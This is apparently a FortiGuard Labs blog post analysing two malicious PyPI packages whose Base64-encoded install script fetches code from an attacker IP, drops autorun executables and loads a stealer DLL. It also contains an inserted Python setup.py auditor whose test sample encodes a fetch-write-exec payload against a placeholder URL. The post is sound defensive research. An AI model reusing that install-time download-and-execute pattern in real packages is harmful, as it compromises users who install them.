FortiGuard Labs Threat Research

More Supply Chain Attacks via New Malicious Python Packages in PyPi

By Jin Lee | February 20, 2023

The FortiGuard Labs team has discovered another 0-day attack in PyPI (Python Package Index) packages by the malware authors ‘Portugal’ and ‘Brazil’, who published the packages ‘xhttpsp’ and ‘httpssp’. These two packages were discovered on January 31, 2023, by monitoring an open-source ecosystem. They were both published on January 27, 2023. Each included one version and an empty description, as shown below.

Figure 1: Package ‘xhttpsp’ author information

Figure 2: Project description of ‘xhttpsp’

Figure 3: Package release history of ‘xhttpsp’

Figure 4: Package ‘httpssp’ author information

Figure 5: Project description of ‘httpssp’

Figure 6: Package release history of ‘httpssp’

The two packages included the same malicious code in their installation script, which appears to be encoded with Base64.

Figure 7: script

When we decoded the encoded string, we found Python code, part of which is shown below.

Figure 8: Decoded string

Within the string, we find an interesting URL, ‘http://54[.]237[.]36[.]60/inject/QrvxFGKvsSJ5E5bx', which the malware reads and then writes to a file to execute.

This URL has not previously been detected by any other threat researchers.

Figure 9: The URL has not been detected by VirusTotal

When accessing the URL, we found heavily obfuscated code, shown below.

Figure 10: Contents of the URL ‘http://54[.]237[.]36[.]60/inject/QrvxFGKvsSJ5E5bx’


When we execute the decoded code from Figure 8, we notice that it drops a file to an arbitrary location with a random name and extension. This may be due to changes in the code every time the URL is refreshed. In this case, it drops the file to ‘%USER%\AppData\Local\Temp’ as ‘yzulmvnb.jpg’ and sets a registry key for auto-run.

Figure 11: Dropped file

Figure 12: Autorun set at startup

When examining the dropped file, we observe that it is another script similar to the one shown in the URL contents.

Figure 13: Contents of the dropped file

Let’s try executing this dropped file.

Figure 14: Dropped file running

One suspicious behavior when executing this file is that it drops a binary executable file to the ‘%USER%’ folder as ‘update.exe’.

Figure 15: Dropped executable file update.exe

A handful of vendors flag this dropped executable file as malicious (SHA 256):


Figure 16: Vendors that detect the dropped executable file update.exe

As shown in Figure 14, it then launches PowerShell, which is another suspicious behavior. It also copies itself to ‘%USER%\AppData\Roaming\Google’ as ‘Chrome.exe’ and sets autorun for this copied executable.

Figure 17: Dropped copy as Chrome.exe

Figure 18: Autorun set at startup for Chrome.exe

When we dive into the ‘update.exe’ code, we see a binary embedded within it, as shown below.

Figure 19: Snippet of code of binary embedded in update.exe in dnSpy

Figure 20: Snippet of code of update.exe in dnSpy

The embedded binary is a .dll file. As shown in the VirusTotal entry below, many vendors flag this binary, ‘Rdudkye.dll,’ as malicious (SHA 256):


Figure 21: Vendors that detect the binary Rdudkye.dll

While the code is very obfuscated, some functions give clues about what it may do or its capabilities. We can see some interesting functions such as DiscordApi, TelegramApi, Inject, ProcessHollowing, RemoteThreadInjection, HiddenStartup, etc.

Figure 22: Snippet of functions of Rdudkye.dll in dnSpy

This blog shows that although the malicious Python script may appear simple, it is more complex than it seems, with multiple layers. With a simple copy and paste of a brief snippet of code, malware authors can easily distribute malicious packages that steal or exfiltrate sensitive data through platforms such as Discord and Telegram. Heavy obfuscation is a good indication of a malicious package. This technique is quite common among malware authors, so Python end users would be wise to check for it before using new packages.
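As an added defender-side example (not code from this post or from FortiGuard Labs), the following Python audits a setup.py for the pattern described above: long Base64 blobs that decode to Python making exec or network calls, as well as direct exec calls. Both sample setup.py strings, the placeholder URL and all function names are constructed for this illustration; the decoded payload is only parsed, never run.

```python
import ast
import base64
import binascii
import re

# Constructed samples (not from the packages in the post). SUSPICIOUS_SETUP mimics
# a Base64 blob exec'd at install time whose body fetches a URL, writes a file and
# executes it. The URL is a placeholder and nothing here is ever executed.
PAYLOAD = (
    'import urllib.request\n'
    'data = urllib.request.urlopen("http://example.invalid/inject/PLACEHOLDER").read()\n'
    'open("dropped.py", "wb").write(data)\n'
    'exec(data)\n'
)
SUSPICIOUS_SETUP = (
    "import base64\n"
    "exec(base64.b64decode('" + base64.b64encode(PAYLOAD.encode()).decode() + "'))\n"
)
BENIGN_SETUP = 'from setuptools import setup\nsetup(name="demo", version="0.1")\n'
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long Base64-looking runs
URL_RE = re.compile(r"https?://[^\s'\"]+")
RISKY_NAMES = {"exec", "eval", "b64decode", "urlopen", "urlretrieve", "system", "Popen"}

def risky_calls(source):
    """Names of risky functions called in source, found by parsing it as Python."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return set()  # decoded bytes that are not Python are ignored
    found = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            # ast.Name has .id (exec); ast.Attribute has .attr (base64.b64decode)
            name = getattr(node.func, "id", None) or getattr(node.func, "attr", None)
            if name in RISKY_NAMES:
                found.add(name)
    return found

def audit_setup(source):
    """Flag a setup.py that makes risky calls directly or inside a Base64 blob."""
    report = {"direct": sorted(risky_calls(source)), "decoded": []}
    for match in B64_RE.finditer(source):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        calls = risky_calls(text)
        if calls:  # report only blobs that decode to Python making risky calls
            report["decoded"].append({"calls": sorted(calls), "urls": URL_RE.findall(text)})
    report["suspicious"] = bool(report["decoded"]) or bool({"exec", "eval"} & set(report["direct"]))
    return report
```

Run `audit_setup` over the setup.py of a package before installing it; a hit in `decoded` (risky calls plus a URL inside an encoded blob) is the signature of the installer described in this post.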


Fortinet Protections

FortiGuard Labs notified Python Package Index administrators about this malicious package, and they have confirmed that it has been taken down.

FortiGuard AntiVirus detects the malicious executables identified in this report as

update.exe: MSIL/Agent.OQX!tr.dldr

Rdudkye.dll: MSIL/Kryptik.AGJS!tr

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.

The FortiGuard Web Filtering Service detects the download URLs cited in this report as Malicious and blocks them.

Malicious URLs


Learn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard AI-powered security services portfolio.